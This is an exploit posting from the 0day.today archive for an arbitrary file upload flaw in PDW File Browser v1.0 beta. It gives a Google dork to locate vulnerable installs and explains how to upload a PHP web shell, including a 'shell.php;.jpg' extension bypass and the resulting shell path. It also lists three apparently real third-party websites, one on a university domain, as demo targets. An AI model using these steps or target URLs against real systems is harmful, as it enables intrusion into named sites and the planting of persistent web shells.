PDW File Browser v1.0 beta Arbitrary File Upload Vulnerability

2012-12-16T00:00:00
ID 1337DAY-ID-19986
Type zdt
Reporter Zikou-16
Modified 2012-12-16T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            -------------------------------------------------------------------------------
         pdw file browser Arbitrary File Upload Vulnerability
--------------------------------------------------------------------------------
 

#####
# Author => Zikou-16
#
# Facebook => http://fb.me/Zikou.se
#
# Google Dork => inurl:"pdw_file_browser"
#
# Tested on : Windows 7 , Backtrack 5r3 
####

Exploit :

Go to => http://localhost/pdw_file_browser/  => Upload => Browse...

& upload your shell => shell.php or try with shell.php;.jpg

your shell : 4 example => Currently uploading in folder: /pdw_file_browser/img/
                       => http://localhost/pdw_file_browser/img/shell.php
                       => http://localhost/pdw_file_browser/img/shell.php;.jpg

------------------------------

[#] Demos :

http://www.peterkiss.com/pdw_file_browser/
http://blueskybrokers.org/pdw_file_browser/
http://www.hss.ed.ac.uk/web-team/test/editpage/pdw_file_browser/

------------------------------ The End

#  0day.today [2018-02-07]  #